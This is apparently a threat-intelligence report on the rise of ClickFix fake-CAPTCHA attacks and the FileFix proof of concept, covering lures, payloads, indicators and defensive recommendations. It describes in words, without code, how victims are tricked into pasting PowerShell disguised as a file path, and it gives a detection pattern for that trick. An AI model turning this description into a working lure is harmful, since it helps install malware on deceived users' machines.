Full Report
The ClickFix social engineering tactic as an initial access vector using fake CAPTCHA verifications increased by 517% between the second half of 2024 and the first half of this year, according to data from ESET. "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even
Analysis Summary
# Incident Report: Surge in Deceptive User Interaction Attacks (ClickFix & FileFix Analysis)
## Executive Summary
This analysis summarizes a significant increase in deceptive social engineering tactics, specifically the ClickFix method (which relies on users copy-pasting malicious scripts from fake CAPTCHA prompts) and the emergence of an alternative, **FileFix**. These methods are leading to the deployment of various malware, including infostealers, ransomware, and Remote Access Trojans (RATs). The report covers the mechanics of these attacks, associated phishing campaigns utilizing aged domains and legitimate platforms like Vercel, and the diverse resulting payloads observed globally.
## Incident Details
- Discovery Date: Throughout H1 2025 (Data presented focuses on observed trends leading up to June 26, 2025)
- Incident Date: Ongoing/H1 2025 Trend Analysis
- Affected Organization: Multi-sectoral targets observed globally, with high detection volumes in Japan, Peru, Poland, Spain, and Slovakia.
- Sector: Cross-industry (General threat observed across organizations utilizing web interactions/email)
- Geography: Global (Focus on Japan, Peru, Poland, Spain, Slovakia)
## Timeline of Events
### Initial Access
- Date/Time: Ongoing (Reported 517% increase in H1 2025 vs H2 2024)
- Vector (ClickFix): Social engineering via fake CAPTCHA verification or bogus error messages presented on a malicious webpage. Victims are tricked into copying and pasting a malicious script into the Windows Run dialog or macOS Terminal.
- Vector (FileFix PoC): Social engineering using phishing via fake document sharing prompts. Victims are tricked into copying a malicious command (prepended PowerShell command masked as a file path) into the Windows File Explorer address bar (via CTRL+L) after clicking an "Open File Explorer" button.
- Details: ClickFix utilizes scripted execution triggered by user interaction with system shells. FileFix leverages the File Explorer's ability to execute OS commands via the address bar.
### Lateral Movement
- Not explicitly detailed in the article regarding lateral movement *after* initial access, but the resulting malware payloads suggest potential for C2 communication and internal reconnaissance (e.g., Remcos RAT, XWorm).
### Data Exfiltration/Impact
- Impact Payload Diversity: Attacks lead to the deployment of infostealers, ransomware, Remote Access Trojans (RATs), cryptominers, post-exploitation tools, and custom nation-state aligned malware.
### Detection & Response
- Detection: ESET detected a 517% surge in ClickFix related threats in H1 2025. Various security vendors tracked associated phishing and malware campaigns (TXTag, Remcos, XWorm, Lumma Stealer).
- Response actions taken: Not detailed; this is a threat intelligence aggregation report rather than a specific incident response timeline focusing on a single victim organization.
## Attack Methodology
| Stage | Method/Techniques Used |
| :--- | :--- |
| **Initial Access** | ClickFix (Fake CAPTCHA/Run Dialog Script Paste); FileFix (File Explorer Path Execution); Phishing Email Lures (Mailbox full warnings, DMV tolls, SharePoint redirects). |
| **Persistence** | Implied persistence via deployed malware payloads (RATs, cryptominers). |
| **Privilege Escalation** | Not explicitly detailed, but dependency on user execution of scripts/commands may grant initial user-level access. |
| **Defense Evasion** | SharePoint Hosting: Pages hosted on subdomains like `*.sharepoint[.]com` are less likely to be flagged by EDR/AV. Use of legitimate platforms (Vercel) to host malicious sites. Strategic Domain Aging (LLDs). |
| **Credential Access** | Directly targeting credentials via spoofed Microsoft Teams pages, mailbox full warnings, and DMV/toll credential harvesting sites. |
| **Discovery** | Implied investigation by deployed RATs/Post-exploitation tools. |
| **Lateral Movement** | Implied via capabilities of deployed RATs (e.g., Remcos RAT). |
| **Collection** | Harvesting for personal/financial information, Microsoft account credentials, and general data via deployed stealers (Lumma Stealer) or RATs. PDF links used as initial drop points. |
| **Exfiltration** | Not detailed, pending data type; assumed to be handled by deployed malware families. |
| **Impact** | Full control via LogMeIn impersonation payload; operational disruption via ransomware; data theft via stealers. |
## Impact Assessment
- Financial: Not quantified, but associated with costs from ransomware, remediation, and data breach liabilities.
- Data Breach: Credentials stolen (Microsoft accounts), personal/financial information harvested (DMV lures), general data loss via Stealers (e.g., Lumma).
- Operational: Potential for significant disruption via deployment of ransomware or full remote control via RATs/LogMeIn payloads.
- Reputational: Damage associated with compromised credentials and the deceptive nature of the attacks (impersonating MS services, DMVs).
## Indicators of Compromise
*Note: Due to the nature of the report focusing on *techniques*, specific IOCs are limited to examples cited in associated campaigns.*
- **Network indicators**: Communication with domains used in strategic domain aging campaigns; connections to compromised Vercel instances hosting malware.
- **File indicators**: Malicious LNK files delivered in ZIP archives; execution scripts related to ClickFix/FileFix manipulation; payloads including XWorm malware or Lumma Stealer.
- **Behavioral indicators**: Analysis of traffic indicating abuse of Windows File Explorer address bar syntax to execute PowerShell commands; suspicious outbound connections from user endpoints to C2 infrastructure following initial social engineering interaction.
## Response Actions
- **Containment**: Identifying and blocking attacker infrastructure related to deployed payloads (RATs, Stealers) once identified. Restricting access from known malicious IPs/domains (if attributed).
- **Eradication**: Removing persistent malware (RATs, Stealers, Cryptominers) from infected endpoints once confirmed via threat intelligence feeds.
- **Recovery**: Forcing password resets for compromised Microsoft accounts; system reimaging where necessary following confirmed RAT deployment (e.g., Remcos).
## Lessons Learned
- User interaction attacks (copy/paste commands into high-privilege system dialogs like Run or File Explorer) are proving extremely effective and scalable, with a high observed growth rate (517% for ClickFix).
- Threat actors are actively weaponizing legitimate/trusted platforms (SharePoint, Vercel) and techniques (Strategic Domain Aging) to bypass traditional security controls (EDR/AV).
- Malware chains are highly diverse, ranging from simple credential harvesting to deploying advanced RATs and custom nation-state malware.
## Recommendations
- **Implement robust user awareness training** specifically targeting copy/paste commands executed in system dialogs (Run, Terminal, File Explorer address bar), highlighting that IT support or vendor prompts will rarely require this action.
- **Harden EDR/Antivirus signatures** to proactively detect string manipulation patterns indicative of the FileFix PoC (e.g., PowerShell execution prepended with comments `#` followed by legitimate-looking Windows paths).
- **Increase scrutiny on emails originating from known legitimate external services** (like SharePoint links) and implement stricter gateway filtering for attachments often used in multi-stage delivery (e.g., LNK files in ZIP archives).
- **Implement Zero Trust controls** to limit the scope of what standard user accounts can execute via OS shells or File Explorer interactions.